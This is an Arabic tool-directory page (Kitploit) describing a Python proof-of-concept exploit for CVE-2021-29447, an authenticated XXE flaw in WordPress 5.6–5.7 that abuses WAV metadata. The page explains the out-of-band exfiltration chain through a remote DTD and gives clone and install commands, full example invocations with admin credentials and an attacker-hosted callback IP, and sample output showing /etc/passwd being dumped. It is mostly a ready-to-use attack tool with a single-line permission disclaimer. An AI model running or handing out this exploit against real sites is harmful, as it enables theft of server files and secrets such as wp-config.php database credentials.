Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7 — POC لاستغلال حقن XXE المُوثَّق في WordPress 5.6-5.7 (PHP 8+). | Kitploit
أدوات/GitHubGitHub/tea-on/cve-2021-29447-authenticated-xxe-wordpress-5.6-5.7
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتجمع المعلوماتاختبار الاختراق
GitHubtea-on/cve-2021-29447-authenticated-xxe-wordpress-5.6-5.7

CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7

POC لاستغلال حقن XXE المُوثَّق في WordPress 5.6-5.7 (PHP 8+).

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

CVE-2021-29447 استغلال XXE المُصادق عليه في ووردبريس 🎯

نص برمجي بتقنية Python لاستغلال ثغرة XXE المُصادق عليها (CVE-2021-29447) في إصدارات ووردبريس 5.6–5.7 عبر بيانات WAV الوصفية. يستغل مقطع iXML داخل ملفات WAV لإطلاق استخراج خارج النطاق (OOB) للبيانات الحساسة—مثل /etc/passwd و wp-config.php وغيرها—مباشرة إلى مجلد dump/ لديك.


كيف يعمل 🔍

يستغل هذا السكربت خلل الكيان الخارجي XML (XXE) في طريقة تحليل ووردبريس لبيانات WAV الوصفية:

  1. إنشاء ملف WAV: يولّد ملف WAV خبيثًا يضم مقطع iXML يشير إلى DTD بعيد على جهازك.
  2. استضافة DTD: يشغّل خادم HTTP (أو يستخدم خادمك الخاص) لتقديم DTD المصمم، والذي يوجّه ووردبريس لقراءة ملف مستهدف وترميزه Base64 (مثل /etc/passwd).
  3. رفع الملف: يتحقق من الهوية لدى ووردبريس، يسترجع nonce الخاص برفع الوسائط، ويرفع ملف WAV عبر مكتبة الوسائط.
  4. استخراج خارج النطاق OOB: يحلل ووردبريس ملف WAV، ويجلب DTD، ثم ينفذ استدعاءً راجعًا إلى خادمك يحتوي على بيانات Base64. يقوم السكربت بفك ترميزها وكتابتها في dump/.

الميزات الرئيسية ⚡

  • الوضع التفاعلي (-i): يطلب مسارات الملفات حتى تضغط CTRL+C—مثالي للاستكشاف الفوري.
  • وضع قائمة الكلمات (-w <file>): معالجة دفعة لعشرات مسارات الملفات من قائمة.
  • تخطي خادم HTTP (--no-http): استخدم خادم الويب الخاص بك بدلاً من الخادم المدمج.
  • وضع التصحيح (--debug): اعرض سجلات تصحيح مفصلة لـ HTTP والعمليات الداخلية.
  • سجلات نظيفة وملوّنة: تسميات مسبوقة—[CONFIG], [UPLOAD], [DUMP], [WARN], [ERROR]—لفحص الحالة بسرعة.
  • مهلة زمنية قابلة للضبط: انتظر حتى 6 ثوانٍ لكل عملية استخراج قبل المتابعة.

التثبيت 🛠️

  1. استنسخ المستودع:
    root@kitploit:~
    git clone https://github.com/Tea-On/CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7.git
    cd CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7
    
  2. ثبّت تبعية Python:
    root@kitploit:~
    pip3 install requests
    

🧾 مرجع الوسائط


مثال على الاستخدام 💥

الوضع التفاعلي

root@kitploit:~
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local -i
root@kitploit:~
[CONFIG] Interactive mode (CTRL+C to exit)
File> /etc/passwd
[CONFIG] DTD written: dtd/L2V0Yy9wYXNzd2Q=.dtd
[CONFIG] WAV built
[INFO] Nonce: d87f00a552
[DUMP] Dumped: dump/passwd
[UPLOAD] Upload ok (200)
[UPLOAD] URL: http://vulnerable.local/wp-content/uploads/payload.wav
File>

وضع قائمة الكلمات

root@kitploit:~
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local -w wordlist.txt
root@kitploit:~
[CONFIG] Loaded 4 paths from "wordlist.txt"
[CONFIG] Using HTTP server at 10.10.14.8:8080
[CONFIG] Starting batch exfiltration...
[DUMP] [/etc/passwd] → dump/passwd
[WARN] No exfil for /etc/hostname within 6s, continuing
[UPLOAD] Upload ok (200)
[ERROR] Upload fail (502) on "/nonexistent"

بدون خادم ووضع التصحيح

root@kitploit:~
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local --no-http --debug -w wordlist.txt

استخدم خادم HTTP الخاص بك لاستضافة dtd/ والتقاط الاستدعاءات. تظهر سجلات التصحيح بصيغة [DEBUG].


مجلدات الإخراج 📂

  • dtd/ – ملفات DTD المُولّدة التي تُقدَّم إلى الهدف.
  • dump/ – محتويات الملفات المفكوكة الترميز، مسماة حسب المسار الأصلي.

نصائح وحيل 💡

  • اضبط المهلة: غيّر متغير EXFIL_TIMEOUT (الافتراضي 6 ثوانٍ) للشبكات البطيئة.
  • استخدم التصحيح: فعّل --debug لتشخيص مشاكل المصادقة أو الرفع أو الاستدعاءات.

الإفصاح المسؤول والترخيص 🔐

استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

مرخصة بموجب رخصة MIT. المساهمات مرحّب بها—لنبقَ الاختراق أخلاقيًا وممتعًا! ✨

تنزيل الأداة
ArgumentRequiredDescription
-H, --host✅المضيف المحلي/IP لتقديم DTD واستقبال الاستدعاءات
-p, --port✅المنفذ المحلي لخادم HTTP
-u, --user✅اسم مستخدم ووردبريس لديه صلاحيات رفع
-P, --pass✅كلمة مرور ووردبريس
-d, --domain✅عنوان URL لووردبريس الهدف (ضمّن http://)
-w, --wordlist❌ملف يحتوي على مسارات مفصولة بأسطر جديدة لجلبها
-i, --interactive❌المطالبة بمسارات الملفات بشكل تفاعلي
--no-http❌تخطي تشغيل خادم HTTP المدمج
--debug❌تفعيل سجلات التصحيح (تفاصيل HTTP والأمور الداخلية المفصلة)